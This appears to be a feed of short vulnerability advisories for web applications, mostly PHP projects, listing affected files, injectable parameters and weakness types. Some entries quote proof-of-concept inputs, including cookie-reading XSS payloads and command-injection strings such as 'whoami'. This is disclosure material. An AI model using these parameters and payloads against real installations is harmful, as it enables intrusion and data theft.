A vulnerability was found in SourceCodester Medicine Tracking System 1.0. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument page leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249137 was assigned to this vulnerability.
A vulnerability was found in y_project RuoYi 4.7.8. It has been declared as problematic. This vulnerability affects unknown code of the file /login of the component HTTP POST Request Handler. The manipulation of the argument rememberMe with the input falsen3f0m&lt;script&gt;alert(1)&lt;/script&gt;p86o0 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249136.
A vulnerability was found in code-projects Intern Membership Management System 2.0. It has been classified as problematic. This affects an unknown part of the file /user_registration/ of the component User Registration. The manipulation of the argument userName/firstName/lastName/userEmail with the input "&gt;&lt;ScRiPt&gt;confirm(document.domain)&lt;/ScRiPt&gt;h0la leads to cross site scripting. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249135.
A vulnerability was found in code-projects Intern Membership Management System 2.0 and classified as critical. Affected by this issue is some unknown functionality of the file /user_registration/ of the component User Registration. The manipulation of the argument userName leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249134 is the identifier assigned to this vulnerability.
A vulnerability has been found in code-projects College Notes Gallery 2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument user leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249133 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in code-projects Voting System 1.0. Affected is an unknown function of the component Voters Login. The manipulation of the argument voter leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249132.
A vulnerability, which was classified as critical, has been found in code-projects Voting System 1.0. This issue affects some unknown processing of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249131.
A vulnerability classified as critical was found in code-projects Automated Voting System 1.0. This vulnerability affects unknown code of the component Login. The manipulation of the argument idno leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249130 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in code-projects E-Commerce Site 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument keyword with the input &lt;video/src=x onerror=alert(document.cookie)&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249096.
A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracking System 1.0. This issue affects some unknown processing of the file /classes/Master.php? f=save_medicine. The manipulation of the argument id/name/description leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249095.
A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in code-projects Library Management System 2.0. Affected is an unknown function of the file index.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249006 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in code-projects Library Management System 2.0. This issue affects some unknown processing of the file login.php. The manipulation of the argument student leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249005 was assigned to this vulnerability.
A vulnerability classified as critical was found in code-projects Library Management System 2.0. This vulnerability affects unknown code of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249004.
A vulnerability classified as problematic has been found in code-projects E-Commerce Website 1.0. This affects an unknown part of the file user_signup.php. The manipulation of the argument firstname with the input &lt;video/src=x onerror=alert(document.domain)&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249003.
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file user_signup.php. The manipulation of the argument firstname/middlename/email/address/contact/username leads to sql injection. The attack may be launched remotely. VDB-249002 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file product_details.php?prod_id=11. The manipulation of the argument prod_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249001 was assigned to this vulnerability.
A vulnerability was found in code-projects E-Commerce Website 1.0. It has been classified as critical. Affected is an unknown function of the file index_search.php. The manipulation of the argument search leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249000.
A vulnerability, which was classified as critical, was found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file /admin/bwdates-report-details.php. The manipulation of the argument fdate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248952.
A vulnerability, which was classified as critical, has been found in PHPGurukul Nipah Virus Testing Management System 1.0. This issue affects some unknown processing of the file bwdates-report-result.php. The manipulation of the argument fromdate leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248951.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in icret EasyImages 2.8.3. This vulnerability affects unknown code of the file app/hide.php. The manipulation of the argument key leads to path traversal: '../filedir'. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-248950 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability classified as critical has been found in code-projects Water Billing System 1.0. This affects an unknown part of the file /addbill.php. The manipulation of the argument owners_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248949 was assigned to this vulnerability.
A vulnerability was found in code-projects Faculty Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/php/crud.php. The manipulation of the argument fieldname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248948.
A vulnerability classified as problematic was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected by this vulnerability is an unknown functionality of the file /protocol/nsasg6.0.tgz. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248941 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in KylinSoft kylin-system-updater up to 2.0.5.16-0k2.33. Affected is an unknown function of the file /usr/share/kylin-system-updater/SystemUpdater/UpgradeStrategiesDbus.py of the component com.kylin.systemupgrade Service. The manipulation of the argument SetDownloadspeedMax leads to os command injection. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248940. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Uniway UW-302VP 2.0. It has been rated as problematic. This issue affects some unknown processing of the file /boaform/wlan_basic_set.cgi of the component Admin Web Interface. The manipulation of the argument wlanssid/password leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248939. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Dreamer CMS 4.1.3. It has been declared as problematic. This vulnerability affects unknown code of the file /upload/uploadFile. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248938 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2]['subject']/bug[2]['text']/report['subject'] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848.
A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744.
A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743.
A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability.
A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability.
A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740.
A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739.
A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability.
A vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Byzoro S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688.
A vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packages\standard\templates\post.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579.
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability.
A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&amp;id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability.
A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260.
A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259.
A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256.
A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255.
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability.
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252.
A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release.
A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247.
A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability.
A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.
A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.
A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /item/item_con. The manipulation of the argument item_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247911.
A vulnerability was found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /accounts_con/register_account. The manipulation of the argument Username with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247910 is the identifier assigned to this vulnerability.
A vulnerability has been found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /accounts_con/register_account of the component User Creation Handler. The manipulation of the argument account_type with the input Admin leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247909 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in OTCMS 7.01. Affected is an unknown function of the file /admin/ind_backstage.php. The manipulation of the argument sqlContent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247908.
A vulnerability, which was classified as problematic, was found in SourceCodester Wedding Guest e-Book 1.0. This affects an unknown part of the file /endpoint/add-guest.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-247899.
A vulnerability classified as problematic has been found in PHPGurukul Teacher Subject Allocation Management System 1.0. Affected is an unknown function of the file /admin/course.php of the component Delete Course Handler. The manipulation of the argument delid leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247896.
A vulnerability, which was classified as critical, was found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /article/DelectArticleById/ of the component Article Handler. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-247890 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Thecosy IceCMS up to 2.0.1. This issue affects some unknown processing of the component User Data Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247889 was assigned to this vulnerability.
A vulnerability classified as critical was found in Thecosy IceCMS up to 2.0.1. This vulnerability affects unknown code. The manipulation leads to manage user sessions. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247888.
A vulnerability classified as problematic has been found in Thecosy IceCMS 2.0.1. This affects an unknown part of the file /WebResource/resource of the component Love Handler. The manipulation leads to improper enforcement of a single, unique action. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247887.
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /adplanet/PlanetCommentList of the component API. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247886 is the identifier assigned to this vulnerability.
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /adplanet/PlanetUser of the component API. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247885 was assigned to this vulnerability.
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been classified as problematic. Affected is an unknown function of the file /login of the component Captcha Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247884.
A vulnerability was found in DedeBIZ 6.2 and classified as critical. This issue affects some unknown processing of the file /src/admin/content_batchup_action.php. The manipulation of the argument endid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247883. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Campcodes Web-Based Student Clearance System 1.0. This issue affects some unknown processing of the file /libsystem/login.php. The manipulation of the argument student leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247367.
A vulnerability classified as critical was found in SourceCodester Simple Student Attendance System 1.0. This vulnerability affects unknown code of the file ajax-api.php?action=save_attendance. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247366 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Simple Student Attendance System 1.0. This affects an unknown part of the file /modals/student_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-247365 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. It has been rated as critical. Affected by this issue is some unknown functionality of the file DFLIMG/DFLJPG.py. The manipulation leads to deserialization. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of this vulnerability is VDB-247364. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in PHPEMS 6.x/7.x/8.x/9.0. Affected by this vulnerability is an unknown functionality in the library lib/session.cls.php of the component Session Data Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247357 was assigned to this vulnerability.
A vulnerability was found in PHPGurukul Teacher Subject Allocation Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/subject.php of the component Create a new Subject. The manipulation of the argument cid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247346 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Matrimonial Site 1.0. It has been classified as critical. Affected is an unknown function of the file /auth/auth.php?user=1. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247344.
A vulnerability was found in SourceCodester Simple Invoice Generator System 1.0 and classified as problematic. This issue affects some unknown processing of the file login.php. The manipulation of the argument cashier leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247343.
A vulnerability has been found in PHPGurukul Teacher Subject Allocation Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file index.php. The manipulation of the argument searchdata with the input &lt;script&gt;alert(5)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-247342 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file password-recovery.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247341 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in AMTT HiBOS 1.0. Affected by this issue is some unknown functionality. The manipulation of the argument Type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247340. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in linkding 1.23.0. Affected is an unknown function. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.23.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-247338 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product.
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /modals/class_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247256.
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247255.
